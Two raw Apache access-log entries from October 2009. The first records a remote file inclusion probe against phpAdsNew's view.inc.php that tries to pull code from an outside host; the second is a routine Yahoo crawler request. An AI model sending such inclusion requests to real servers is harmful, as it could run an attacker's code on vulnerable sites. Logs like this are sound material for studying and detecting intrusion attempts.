82.151.132.176 - - [18/Oct/2009:04:59:43 -0400] "GET /logs/access_log.Q109052400//phpAdsNew/view.inc.php?=http://dubnahome.ru//one.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
72.30.78.230 - - [18/Oct/2009:05:00:15 -0400] "GET /logs/error_log.Q109091200 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
